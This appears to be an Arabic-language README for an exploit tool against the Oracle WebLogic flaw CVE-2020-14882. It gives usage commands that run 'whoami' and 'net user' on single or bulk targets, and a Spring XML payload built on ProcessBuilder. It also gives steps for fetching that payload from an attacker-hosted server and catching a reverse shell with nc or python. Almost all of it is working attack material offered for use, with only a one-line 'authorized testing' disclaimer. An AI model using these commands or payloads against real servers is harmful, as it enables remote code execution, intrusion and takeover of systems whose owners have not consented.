
CVE-2020-14882_ALL أداة استغلال شاملة، تدعم اكتشاف عرض الأوامر، عرض الأوامر الجماعي، تنفيذ الأوامر بدون عرض عبر XML خارجي، ووظائف أخرى.
أداة شاملة لاستغلال CVE-2020-14882_ALL، تدعم كشف إظهار الأوامر وإظهار الأوامر بشكل جماعي وتنفيذ الأوامر بدون إظهار باستخدام ملف XML خارجي.
الوحدات المطلوبة: requests, http.client
** (الأداة مخصصة فقط لاختبار الأمان المصرح به، يرجى عدم استخدامها بشكل غير قانوني. المخالفات لا علاقة لها بالمؤلف.) **
الإصدارات المعروفة الناجحة لوحدة إظهار الأوامر: 12.2.1.3.0، 12.2.1.4.0، 14.1.1.0.0

python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "net user"

python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "whoami"

python3 CVE-2020-14882_ALL.py -f target.txt -c "whoami"
تنسيق target.txt: http://x.x.x.x:xx، سطر واحد لكل عنوان.

1- على سبيل المثال، لإنشاء شل عكسية على لينكس، قم بتحرير ملف poc.xml وابدأ الاستماع عبر بايثون.
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>cmd</value>
</list>
</constructor-arg>
</bean>
</beans>
قم ببدء الاستماع عبر بايثون.

قم ببدء الاستماع عبر nc.

2- استخدم الخيار -x لتحديد مسار ملف XML وإرسال البايلود.
python3 CVE-2020-14882_ALL.py -u http://xxxx:7001 -x http://xxx:8000/poc.xml

3- استقبال الشل بنجاح.
